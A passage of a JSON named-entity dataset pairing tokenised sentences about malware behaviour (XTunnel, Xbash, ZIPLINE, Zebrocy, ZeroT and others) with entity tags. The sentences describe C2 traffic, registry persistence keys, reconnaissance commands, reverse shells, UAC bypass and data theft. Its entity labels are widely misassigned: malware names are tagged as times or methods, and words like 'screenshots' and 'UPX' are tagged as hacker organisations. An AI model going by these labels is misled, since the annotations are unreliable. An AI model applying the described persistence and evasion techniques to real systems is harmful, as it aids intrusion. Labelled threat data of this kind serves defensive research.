"XCSSET", - "executes", - "additional", - "modules." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "a", - "shell", - "script", - "to", - "execute", - "Mach-o", - "files", - "and", - "<code>osacompile</code>", - "commands", - "such", - "as,", - "<code>osacompile", - "-x", - "-o", - "xcode.app", - "main.applescript</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XTunnel", - "uses", - "SSL/TLS", - "and", - "RC4", - "to", - "encrypt", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "A", - "version", - "of", - "XTunnel", - "introduced", - "in", - "July", - "2015", - "inserted", - "junk", - "code", - "into", - "the", - "binary", - "in", - "a", - "likely", - "attempt", - "to", - "obfuscate", - "it", - "and", - "bypass", - "security", - "products." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Time", - "I-Time", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XTunnel", - "is", - "capable", - "of", - "accessing", - "locally", - "stored", - "passwords", - "on", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "C2", - "server", - "used", - "by", - "XTunnel", - "provides", - "a", - "port", - "number", - "to", - "the", - "victim", - "to", - "use", - "as", - "a", - "fallback", - "in", - "case", - "the", - "connection", - "closes", - "on", - "the", - "currently", - "used", - "port." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XTunnel", - "is", - "capable", - "of", - "probing", - "the", - "network", - "for", - "open", - "ports." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "version", - "of", - "XTunnel", - "introduced", - "in", - "July", - "2015", - "obfuscated", - "the", - "binary", - "using", - "opaque", - "predicates", - "and", - "other", - "techniques", - "in", - "a", - "likely", - "attempt", - "to", - "obfuscate", - "it", - "and", - "bypass", - "security", - "products." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Time", - "I-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XTunnel", - "relays", - "traffic", - "between", - "a", - "C2", - "server", - "and", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XTunnel", - "has", - "been", - "used", - "to", - "execute", - "remote", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "create", - "a", - "cronjob", - "for", - "persistence", - "if", - "it", - "determines", - "it", - "is", - "on", - "a", - "Linux", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "has", - "destroyed", - "Linux-based", - "databases", - "as", - "part", - "of", - "its", - "ransomware", - "capabilities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "has", - "maliciously", - "encrypted", - "victim's", - "database", - "systems", - "and", - "demanded", - "a", - "cryptocurrency", - "ransom", - "be", - "paid." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "obtain", - "a", - "webpage", - "hosted", - "on", - "Pastebin", - "to", - "update", - "its", - "C2", - "domain", - "list." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "attempt", - "to", - "exploit", - "known", - "vulnerabilities", - "in", - "Hadoop,", - "Redis,", - "or", - "ActiveMQ", - "when", - "it", - "finds", - "those", - "services", - "running", - "in", - "order", - "to", - "conduct", - "further", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "download", - "additional", - "malicious", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "execute", - "malicious", - "JavaScript", - "payloads", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "use", - "mshta", - "for", - "executing", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "perform", - "port", - "scanning", - "of", - "TCP", - "and", - "UDP", - "ports." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "obtain", - "a", - "list", - "of", - "weak", - "passwords", - "from", - "the", - "C2", - "server", - "to", - "use", - "for", - "brute", - "forcing", - "as", - "well", - "as", - "attempt", - "to", - "brute", - "force", - "services", - "with", - "open", - "ports." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "use", - "scripts", - "to", - "invoke", - "PowerShell", - "to", - "download", - "a", - "malicious", - "PE", - "executable", - "or", - "PE", - "DLL", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "create", - "a", - "Startup", - "item", - "for", - "persistence", - "if", - "it", - "determines", - "it", - "is", - "on", - "a", - "Windows", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "use", - "regsvr32", - "for", - "executing", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "collect", - "IP", - "addresses", - "and", - "local", - "intranet", - "information", - "from", - "a", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "can", - "execute", - "malicious", - "VBScript", - "payloads", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Xbash", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "YAHOYAH", - "decrypts", - "downloaded", - "files", - "before", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "YAHOYAH", - "encrypts", - "its", - "configuration", - "file", - "using", - "a", - "simple", - "algorithm." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "YAHOYAH", - "uses", - "HTTP", - "GET", - "requests", - "to", - "download", - "other", - "files", - "that", - "are", - "executed", - "in", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "YAHOYAH", - "checks", - "for", - "antimalware", - "solution", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "YAHOYAH", - "checks", - "for", - "the", - "system’s", - "Windows", - "OS", - "version", - "and", - "hostname." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "YAHOYAH", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "add", - "itself", - "to", - "the", - "exclusion", - "list", - "for", - "the", - "Ivanti", - "Connect", - "Secure", - "Integrity", - "Checker", - "Tool", - "if", - "the", - "`--exclude`", - "parameter", - "is", - "passed", - "by", - "the", - "`tar`", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "find", - "and", - "append", - "specific", - "files", - "on", - "Ivanti", - "Connect", - "Secure", - "VPNs", - "based", - "upon", - "received", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "download", - "files", - "to", - "be", - "saved", - "on", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "communicate", - "with", - "C2", - "using", - "a", - "custom", - "binary", - "protocol." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "identify", - "running", - "processes", - "and", - "their", - "names." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "create", - "a", - "proxy", - "server", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "use", - "AES-128-CBC", - "to", - "encrypt", - "data", - "for", - "both", - "upload", - "and", - "download." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "identify", - "a", - "specific", - "string", - "in", - "intercepted", - "network", - "traffic,", - "`SSH-2.0-OpenSSH_0.3xx.`,", - "to", - "trigger", - "its", - "command", - "functionality." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIPLINE", - "can", - "use", - "`/bin/sh`", - "to", - "create", - "a", - "reverse", - "shell", - "and", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "ZLib", - "backdoor", - "compresses", - "communications", - "using", - "the", - "standard", - "Zlib", - "compression", - "library." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "has", - "sent", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "has", - "the", - "ability", - "to", - "enumerate", - "files", - "and", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "has", - "the", - "ability", - "to", - "download", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "mimics", - "the", - "resource", - "version", - "information", - "of", - "legitimate", - "Realtek", - "Semiconductor,", - "Nvidia,", - "or", - "Synaptics", - "modules." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "ZLib", - "has", - "the", - "ability", - "to", - "obtain", - "screenshots", - "of", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "has", - "the", - "ability", - "to", - "enumerate", - "system", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "has", - "the", - "ability", - "to", - "discover", - "and", - "manipulate", - "Windows", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "communicates", - "over", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "has", - "the", - "ability", - "to", - "execute", - "shell", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ZLib", - "creates", - "Registry", - "keys", - "to", - "allow", - "itself", - "to", - "run", - "as", - "various", - "services." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "has", - "used", - "a", - "method", - "similar", - "to", - "RC4", - "as", - "well", - "as", - "AES", - "for", - "encryption", - "and", - "hexadecimal", - "for", - "encoding", - "data", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "uses", - "SSL", - "and", - "AES", - "ECB", - "for", - "encrypting", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "scans", - "the", - "system", - "and", - "automatically", - "collects", - "files", - "with", - "the", - "following", - "extensions:", - ".doc,", - ".docx,", - ",.xls,", - ".xlsx,", - ".pdf,", - ".pptx,", - ".rar,", - ".zip,", - ".jpg,", - ".jpeg,", - ".bmp,", - ".tiff,", - ".kum,", - ".tlg,", - ".sbx,", - ".cr,", - ".hse,", - ".hsf,", - "and", - ".lhz." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Zebrocy", - "installs", - "an", - "application-defined", - "Windows", - "hook", - "to", - "get", - "notified", - "when", - "a", - "network", - "drive", - "has", - "been", - "attached,", - "so", - "it", - "can", - "then", - "use", - "the", - "hook", - "to", - "call", - "its", - "RecordToFile", - "file", - "stealing", - "method." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "has", - "the", - "capability", - "to", - "upload", - "dumper", - "tools", - "that", - "extract", - "credentials", - "from", - "web", - "browsers", - "and", - "store", - "them", - "in", - "database", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "decodes", - "its", - "secondary", - "payload", - "and", - "writes", - "it", - "to", - "the", - "victim’s", - "machine.", - "Zebrocy", - "also", - "uses", - "AES", - "and", - "XOR", - "to", - "decrypt", - "strings", - "and", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "has", - "exfiltrated", - "data", - "to", - "the", - "designated", - "C2", - "server", - "using", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "has", - "a", - "command", - "to", - "delete", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "searches", - "for", - "files", - "that", - "are", - "60mb", - "and", - "less", - "and", - "contain", - "the", - "following", - "extensions:", - ".doc,", - ".docx,", - ".xls,", - ".xlsx,", - ".ppt,", - ".pptx,", - ".exe,", - ".zip,", - "and", - ".rar.", - "Zebrocy", - "also", - "runs", - "the", - "<code>echo", - "%APPDATA%</code>", - "command", - "to", - "list", - "the", - "contents", - "of", - "the", - "directory.", - "Zebrocy", - "can", - "obtain", - "the", - "current", - "execution", - "path", - "as", - "well", - "as", - "perform", - "drive", - "enumeration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "obtains", - "additional", - "code", - "to", - "execute", - "on", - "the", - "victim's", - "machine,", - "including", - "the", - "downloading", - "of", - "a", - "secondary", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "stores", - "all", - "collected", - "information", - "in", - "a", - "single", - "file", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "performs", - "persistence", - "with", - "a", - "logon", - "script", - "via", - "adding", - "to", - "the", - "Registry", - "key", - "<code>HKCU\\Environment\\UserInitMprLogonScript</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "uses", - "SMTP", - "and", - "POP3", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "identifies", - "network", - "drives", - "when", - "they", - "are", - "added", - "to", - "victim", - "systems." - ], - "ner_tags": [ - "B-Time", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "enumerates", - "information", - "about", - "connected", - "storage", - "devices." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "uses", - "the", - "<code>tasklist</code>", - "and", - "<code>wmic", - "process", - "get", - "Capture,", - "ExecutablePath</code>", - "commands", - "to", - "gather", - "the", - "processes", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "executes", - "the", - "<code>reg", - "query</code>", - "command", - "to", - "obtain", - "information", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "creates", - "an", - "entry", - "in", - "a", - "Registry", - "Run", - "key", - "for", - "the", - "malware", - "to", - "execute", - "on", - "startup." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "has", - "a", - "command", - "to", - "create", - "a", - "scheduled", - "task", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "variant", - "of", - "Zebrocy", - "captures", - "screenshots", - "of", - "the", - "victim’s", - "machine", - "in", - "JPEG", - "and", - "BMP", - "format." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy's", - "Delphi", - "variant", - "was", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Zebrocy", - "has", - "used", - "URL/Percent", - "Encoding", - "on", - "data", - "exfiltrated", - "via", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "collects", - "the", - "OS", - "version,", - "computer", - "name", - "and", - "serial", - "number", - "for", - "the", - "storage", - "volume", - "C:\\.", - "Zebrocy", - "also", - "runs", - "the", - "<code>systeminfo</code>", - "command", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "runs", - "the", - "<code>ipconfig", - "/all</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "uses", - "<code>netstat", - "-aon</code>", - "to", - "gather", - "network", - "connection", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "gets", - "the", - "username", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "gathers", - "the", - "current", - "time", - "zone", - "and", - "date", - "information", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Zebrocy", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "variant", - "of", - "Zebrocy", - "uses", - "WMI", - "queries", - "to", - "gather", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "has", - "obfuscated", - "DLLs", - "and", - "functions", - "using", - "dummy", - "API", - "calls", - "inserted", - "between", - "real", - "instructions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Many", - "ZeroT", - "samples", - "can", - "perform", - "UAC", - "bypass", - "by", - "using", - "eventvwr.exe", - "to", - "execute", - "a", - "malicious", - "file." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "has", - "used", - "DLL", - "side-loading", - "to", - "load", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "shellcode", - "decrypts", - "and", - "decompresses", - "its", - "RC4-encrypted", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "has", - "encrypted", - "its", - "payload", - "with", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "can", - "download", - "additional", - "payloads", - "onto", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "ZeroT", - "DLL", - "files", - "have", - "been", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ZeroT", - "has", - "retrieved", - "stage", - "2", - "payloads", - "as", - "Bitmap", - "images", - "that", - "use", - "Least", - "Significant", - "Bit", - "(LSB)", - "steganography." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "has", - "used", - "RC4", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "gathers", - "the", - "victim's", - "computer", - "name,", - "Windows", - "version,", - "and", - "system", - "language,", - "and", - "then", - "sends", - "it", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { 